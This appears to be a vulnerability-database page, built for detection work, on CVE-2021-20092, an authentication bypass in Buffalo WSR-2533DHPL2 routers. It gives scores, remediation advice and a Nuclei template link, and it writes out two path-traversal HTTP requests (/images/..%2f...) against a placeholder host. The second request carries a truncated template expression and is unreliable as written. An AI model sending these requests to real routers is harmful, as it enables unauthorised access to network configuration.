🔙 목록으로 돌아가기

CVE-2021-20092: Buffalo WSR-2533DHPL2 - Improper Access Control

TitleBuffalo WSR-2533DHPL2 - Improper Access Control
Authorgy741,pdteam,parth
SeverityHigh
ImpactAn attacker can exploit this vulnerability to gain unauthorized access to the router's configuration settings and potentially compromise the entire network.
RemediationApply the latest firmware update provided by Buffalo to fix the access control issue.
CVSS Score7.5
EPSS Score0.68874
CVE IDCVE-2021-20092
CWE IDCWE-287
Tags cve2021 cve buffalo firmware iot tenable vkev vuln

🔍 Vulnerability Description

The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.

🌐 HTTP Request

GET /images/..%2finfo.html HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13) AppleWebKit/619.4 (KHTML, like Gecko) Version/16.1.13 Safari/619.4
Connection: close
Referer: http://www.victim.com/info.html
Accept-Encoding: gzip
GET /images/..%2fcgi/cgi_i_filter.js?_tn=\{\{trimprefix(base64_decode(httoken), HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: lang=8; url=ping.html; mobile=false;
Referer: http://www.victim.com/info.html
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-20092.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-20092.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A